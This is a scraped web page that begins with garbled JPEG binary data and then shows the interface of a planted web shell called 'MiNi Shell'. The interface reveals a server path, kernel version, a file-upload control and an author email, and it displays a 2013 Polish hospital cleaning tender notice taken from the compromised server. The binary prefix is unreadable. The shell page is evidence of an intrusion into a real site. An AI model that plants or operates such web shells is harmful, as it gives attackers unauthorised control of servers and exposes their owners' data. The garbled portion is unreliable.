JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131018/425878-N-2013.html

<p class="kh_header"><b>Legnica: USŁUGA SPRZĄTANIA CIĄGÓW KOMUNIKACYJNYCH W BUDYNKACH  WOJEWÓDZKIEGO SZPITALA  SPECJALISTYCZNEGO W LEGNICY</b><br>
<b>Numer ogłoszenia: 425878 - 2013; data zamieszczenia: 18.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny w Legnicy , ul. J. Iwaszkiewicza 5, 59-220 Legnica, woj. dolnośląskie, tel. (076) 721 11 26, faks (076) 721 11 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.legnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA SPRZĄTANIA CIĄGÓW KOMUNIKACYJNYCH W BUDYNKACH  WOJEWÓDZKIEGO SZPITALA  SPECJALISTYCZNEGO W LEGNICY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa sprzątania, utrzymania porządku i czystości oraz dezynfekcji ciągów komunikacyjnych (obejmujących w szczególności: korytarze, schody, windy, okna i drzwi) należących do Strefy II ogólnej czystości medycznej w budynkach Wojewódzkiego Szpitala Specjalistycznego w Legnicy położonych przy ul. Iwaszkiewicza 5, o powierzchniach:
Tabela nr 1
Lp

Powierzchnia ciągów komunikacyjnych (powierzchnia podłóg i schodów)
Powierzchnia ścian 


Powierzchnia okien jednostronna


Powierzchnia paneli sufitowych 
Ściany pomalowane farbami zmywalnymi (czyszczenie przy użyciu wody)
Ściany pomalowane farbą emulsyjną (do odkurzania)
Ściany pokryte panelami drewnianymi
Ściany wyłożone kaflami marmurowymi
Ściany wyłożone kafelkami
1
7 256,92 m2
6411,29m2
989,92m2
303,75m2
471,23m2
276,84m2
706,67m2 
3883,57m2 

7 256,92 m2
8453,03 m2
706,67 m2 
3883,57m2

Zamawiający wymaga wykonywania kompleksowego maszynowego i ręcznego utrzymania w czystości i prawidłowym stanie sanitarnohigienicznym głównych ciągów komunikacyjnych (korytarzy, klatek schodowych i wind). Wykonywanie usługi winno odbywać się 7 dni w tygodniu, od poniedziałku do niedzieli od godziny 07.00 do 19.00.
-Wykonywane czynności oraz technologie stosowane przy realizacji przedmiotowej usługi winny: 
1) gwarantować i spełniać utrzymanie właściwej higieny sanitarnej, 
2)spełniać wymogi sanitarno-epidemiologiczne, 
3) zapewniać estetyczny wygląd sprzątanych powierzchni i pomieszczeń. 
-Zamawiający na terenie wykonywania przedmiotu zamówienia posiada podłogi wykonane z:
1)wykładzin PCV spoinowych
2)płytek glazurowanych i lastryko 
3)powierzchni marmurowych
4) bezspoinowych posadzek typu Hemetin
- Zamawiający na terenie wykonywania przedmiotu zamówienia posiada ściany:
1) o powierzchniach pomalowanych farbą olejną
 2) o powierzchniach pomalowanych farbą emulsyjną
3) o powierzchniach wykonanych z marmuru
4) posiadające wmontowane elementy drewniane
- Klatki schodowe (schody) wykonane są z płytek lastryko 
-Zamawiający na terenie wykonywania przedmiotu zamówienia posiada drzwi wykonane z:
1) płyt wiórowych malowane farbą olejną
2) szkła i elementów aluminiowych bądź plastikowych

Wymagania Zamawiającego dotyczące częstotliwości wykonywanej w ramach zamówienia usługi
Tabela nr 2
CIĄGI KOMUNIKACYJNE
Czynności do wykonania
Częstotliwość wykonywanych czynności
Rodzaj środka
Mycie powierzchni korytarzy wraz z listwami przypodłogowymi
na bieżąco (min. 2 x dziennie) w godzinach  rannych i popołudniowych
 Detergent
Mycie schodów


na bieżąco (min. 2 x dziennie) w godzinach rannych i popołudniowych


 Detergent 
Mycie schodów wewnętrznych - ewakuacyjnych 
1 x w miesiącu
 Detergent
Mycie i dezynfekcja 12  wind osobowych i towarowych  (w tym drzwi, ścian oraz paneli sterujących )
Mycie na bieżąco (min.2 x dziennie) Dezynfekcja (min. 1x dziennie )
 Detergent oraz preparat dezynfekcyjny służący do dezynfekcji powierzchni:
wolnych od zanieczyszczeń biologicznych, bez zawartości aldehydu glutarowego, chloru, fenolu, nadtlenku wodoru. Spektrum działania: bakterie i grzyby
Mycie i dezynfekcja poręczy
na bieżąco (min. 1 x dziennie)
Detergent oraz preparat dezynfekcyjny służący do dezynfekcji powierzchni:
wolnych od zanieczyszczeń biologicznych, bez zawartości aldehydu glutarowego, chloru, fenolu, nadtlenku wodoru. Spektrum działania: bakterie i grzyby
Mycie parapetów
min. 1 x dziennie
Detergent
Mycie grzejników i osłon grzejników
minimum raz na miesiąc 
Detergent
Mycie i dezynfekcja klamek drzwi wejściowych zewnętrznych
na bieżąco (min. 2 x dziennie)
Detergent oraz preparat dezynfekcyjny służący do dezynfekcji powierzchni:
wolnych od zanieczyszczeń biologicznych, bez zawartości aldehydu glutarowego, chloru, fenolu, nadtlenku wodoru. Spektrum działania: bakterie i grzyby
Mycie drzwi wewnętrznych  i zewnętrznych  (jedno i dwu- skrzydłowych) - 599 sztuk
Minimum 1 x na  miesiąc
Detergent
Mycie i dezynfekcja klamek oraz  strefy dotykowej ( część drzwi okalająca klamkę w promieniu ok. 20 cm. ) drzwi wewnętrznych
na bieżąco mycie i dezynfekcja  (min. 1 x dziennie)
Detergent oraz preparat dezynfekcyjny służący do dezynfekcji powierzchni:
wolnych od zanieczyszczeń biologicznych, bez zawartości aldehydu glutarowego, chloru, fenolu, nadtlenku wodoru. Spektrum działania: bakterie i grzyby
Sprzątanie korytarzy, schodów ( tylko głównych traktów komunikacyjnych)i wind przy złych warunkach atmosferycznych (deszcz, śnieg, grad)
wg potrzeb (min. 4 x dziennie)
Detergent
Opróżnianie i  mycie 41 sztuk pojemników na odpady komunalne zlokalizowanych w głównych ciągach komunikacyjnych 
na bieżąco (min. 1 x dziennie)
Detergent
Dezynfekcja pojemników na odpady komunalne zlokalizowanych w ciągach komunikacyjnych
 Codziennie wg. potrzeb - w przypadku wystąpienia okoliczności wymagających zdezynfekowania pojemnika (przy wprowadzeniu materiałów zakaźnych:  wymiociny, krew, etc) minimum 1x dziennie
Preparat dezynfekcyjny służący do dezynfekcji powierzchni:zanieczyszczonych materiałem biologicznym , bez zawartości aldehydu glutarowego, na bazie chloru. Spektrum działania: bakterie, grzyby, wirusy, prątki gruźlicy oraz detergent.
Mycie okien  
Umycie każdego okna minimum raz w okresie obowiązywania umowy 
Detergent
Mycie lamp sufitowych
Umycie każdej z lamp minimum raz w okresie obowiązywania umowy minimum 
Detergent
Mycie lampy bakteriobójczej (w  Poradni przeciwgruźliczej) 
minimum. 1 x na miesiąc; mycie palnika lampy 1 x w tygodniu)
Detergent (oraz etanol 70o -tylko palnik lampy)
Odkurzanie i mycie lamp przyściennych
Minimum 1 x na tydzień
Detergent
Mycie i dezynfekcja kontaktów
Minimum 1x dziennie
Detergent oraz preparat dezynfekcyjny służący do dezynfekcji powierzchni:
wolnych od zanieczyszczeń biologicznych, bez zawartości aldehydu glutarowego, chloru, fenolu, nadtlenku wodoru. Spektrum działania: bakterie i grzyby
Mycie bądź odkurzanie ścian  w zależności od rodzaju powierzchni
Powierzchnie ścian wymagające sprzątania przy pomocy mycia i preparatu dezynfekcyjnego 

Umycie bądź odkurzenie każdej ze ścian  minimum raz w okresie obowiązywania umowy 
Detergent oraz preparat dezynfekcyjny służący do dezynfekcji powierzchni:
wolnych od zanieczyszczeń biologicznych, bez zawartości aldehydu glutarowego, chloru, fenolu, nadtlenku wodoru. Spektrum działania: bakterie i grzyby
Konserwacja  (polegająca na rozprowadzeniu preparatów pielęgnacyjno -ochronnych) powierzchni płaskich - podłóg, schodów
minimum raz na miesiąc 
Detergent, preparat pielęgnacyjno-ochronny
Konserwacja ścian wykonanych z marmuru (polegająca na rozprowadzeniu preparatów pielęgnacyjno - ochronnych) przy windach w budynku 1A na poziomie -1 (mycie min. 1 x dziennie)
Konserwacja każdej ze ścian wykonanych z marmuru  minimum raz w okresie obowiązywania umowy przy windach w budynku 1A na poziomie -1 (mycie min. 1 x dziennie)  
Detergent, preparat pielęgnacyjno-ochronny
Mycie paneli sufitowych 

Umycie paneli sufitowych minimum raz w okresie trwania umowy
Detergent
Mycie kratek wentylacyjnych
Umycie kratek wentylacyjnych  minimum raz w okresie trwania umowy
Detergent
Usuwanie pajęczyn
Na bieżąco - w razie wystąpienia potrzeby 
Detergent
Mycie ławek, krzeseł zlokalizowanych  w głównych ciągach komunikacyjnych (76 szt. krzeseł, 83 szt. ławeczek  dla 4 do 8 osób) oraz 46 ławeczek wykonanych z połączonych z 4 krzeseł) 
na bieżąco (min. 1 x dziennie)
Detergent
Dezynfekcja i mycie miejsc, w których  potencjalnie może wystąpić skażenie biologiczne
w razie wystąpienia potrzeby nie poźniej niż w ciągu 15 minut od zgłoszenia pracownikowi Wykonawcy
(przedostanie się krwi, wydzielin ludzkich na powierzchnie objęte przedmiotem zamówienia)
Preparat dezynfekcyjny służący do dezynfekcji powierzchni: zanieczyszczonych materiałem biologicznym , bez zawartości aldehydu glutarowego, na bazie chloru. Spektrum działania: bakterie, grzyby, wirusy, prątki gruźlicy  oraz detergent
W razie wystąpienia nieprzewidzianych okoliczności Zamawiający zastrzega sobie prawo do doraźnej jednostronnej zmiany częstotliwości wykonywanych czynności w określonym zakresie, uwzględniającej jego potrzeby, bez zmian jakichkolwiek innych postanowień umownych. Ponadto, uwzględniając opisane powyżej minimalne częstotliwości  Wykonawca obowiązany jest wykonać którąkolwiek z nich na każde żądanie Zamawiającego.
Zamawiający wymaga przy wykonywaniu czynności dezynfekcji używania przez Wykonawcę preparatów dezynfekcyjnych służących do dezynfekcji powierzchni:
1)wolnych od zanieczyszczeń biologicznych, bez zawartości aldehydu glutarowego, chloru, fenolu, nadtlenku wodoru. Spektrum działania: bakterie i grzyby,
2) zanieczyszczonych materiałem biologicznym, bez zawartości aldehydu glutarowego, na bazie chloru. Spektrum działania: bakterie, grzyby, wirusy, prątki gruźlicy
3)trudno dostępnych w sprayu na bazie alkoholu. Spektrum działania :bakterie, grzyby, wirusy, prątki gruźlicy - w przypadku wystąpienia takiej konieczności
 oraz innych środków niezbędnych w wykonywaniu usługi:
       1) detergenty,
        2) etanol 70o,
        3) preparaty pielęgnacyjno - ochronne stosowane w pielęgnacji powierzchni podłóg i ścian w Szpitalu.
Wykonawca zobligowany będzie do utrzymywania czystości w sposób odpowiadający rodzajom powierzchni opisanych w Tabeli nr 1 wg. zasad określonych w Tabeli nr 2, w przypadku drzwi i okien wykonywania wymaganych czynności na dwóch stronach ich płaszczyzn. 
Wykonawca obowiązany jest do przestrzegania obowiązujących u Zamawiającego zarządzeń wewnętrznych, instrukcji, procedur higieniczno - epidemiologicznych oraz przepisów z zakresu ochrony środowiska. Wewnętrznie obowiązujące akty prawne zostaną udostępnione wykonawcy najpóźniej w pierwszym dniu obowiązywania umowy. 
Ponadto Wykonawca, z którym zostanie podpisana umowa zobowiązany będzie na własny koszt do zapewnienia pracownikom świadczącym usługę, w ramach zawartej umowy, odzieży ochronnej, roboczej, identyfikatorów, apteczki podręcznej, systematycznego prania i dezynfekcji odzieży roboczej. Dodatkowo Wykonawca zobowiązany będzie do zapewnienia worków foliowych na śmieci komunalne koloru czarnego używanych w Szpitalu. 
Przedmiot zamówienia będzie wykonywany wyłącznie przez osoby posiadające aktualne książeczki zdrowia potwierdzające brak przeciwwskazań do wykonania prac na terenie Szpitala. Wykonawca w ciągu jednego dnia od zawarcia umowy zobowiązany jest do przedstawienia do wglądu Pielęgniarce Epidemiologicznej Zamawiającego, aktualne książeczki zdrowia osób wykonujących usługę na terenie Szpitala.
Wykonawca w pełni odpowiada za działania bądź zaniechania swoich pracowników podczas świadczenia usługi będącej przedmiotem zamówienia, a także w przypadku wykonywania w czasie pracy czynności nie ujętych przedmiotem zamówienia. Wykonawca poniesie koszt naprawy lub zakupu sprzętu bądź wyposażenia uszkodzonego przez swój personel w trakcie świadczenia usługi.
Wykonawca poniesie koszty kar administracyjnych wynikające z niedostatecznego wywiązywania się z obowiązku świadczenia usługi oraz zaniedbań w zakresie przepisów bezpieczeństwa i higieny pracy, sanitarno - epidemiologicznych i innych, wykazanych przez zewnętrznych kontrolerów Państwowej Inspekcji Pracy, Państwowej Inspekcji Sanitarnej, itp.
Wykonawca, na żądanie umożliwi upoważnionym pracownikom Zamawiającego przeprowadzenie kontroli używanego do świadczenia usługi sprzętu oraz udostępnieni informacje dotyczące zaopatrzenia Wykonawcy w środki pomocnicze, myjące, dezynfekujące i inne niezbędne do należytego wykonania usługi..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego polegających na powtórzeniu tego samego rodzaju zamówienia, tzn wykonywaniu usługi sprzątania ciągów komunikacyjnych w budynkach WSS w Legnicy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.90.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Dopuszcza się zmiany  umowy w przypadku zmiany stawki podatku VAT. Zmiana stawki nastąpi z dniem wejścia w życie aktu prawnego określającego zmianę stawki VAT w zakresie objętym przedmiotem umowy. Wykonawca zastosuje stawkę nowoobowiązującą bez jakichkolwiek zmian pozostałych elementów ceny.
2.Dopuszcza się zmiany cen na korzystniejsze dla Zamawiającego, przy czym zmiany mogą być dokonane na wniosek Wykonawcy lub Zamawiającego, w terminie do 3 dni od przesłania zawiadomienia w formie propozycji do aneksu do umowy.
3.Zmiana umowy będzie dopuszczalna również w przypadku wystąpienia okoliczności, o których mowa w §4 ust.4</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.legnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyvzny
ul. Iwaszkiewicza 5   59-220 Legnica
pok. 36B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2013 godzina 11:00, miejsce: Wojewódzki Szpital Specjalistyvzny
ul. Iwaszkiewicza 5   59-220 Legnica
Sekretariat Szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com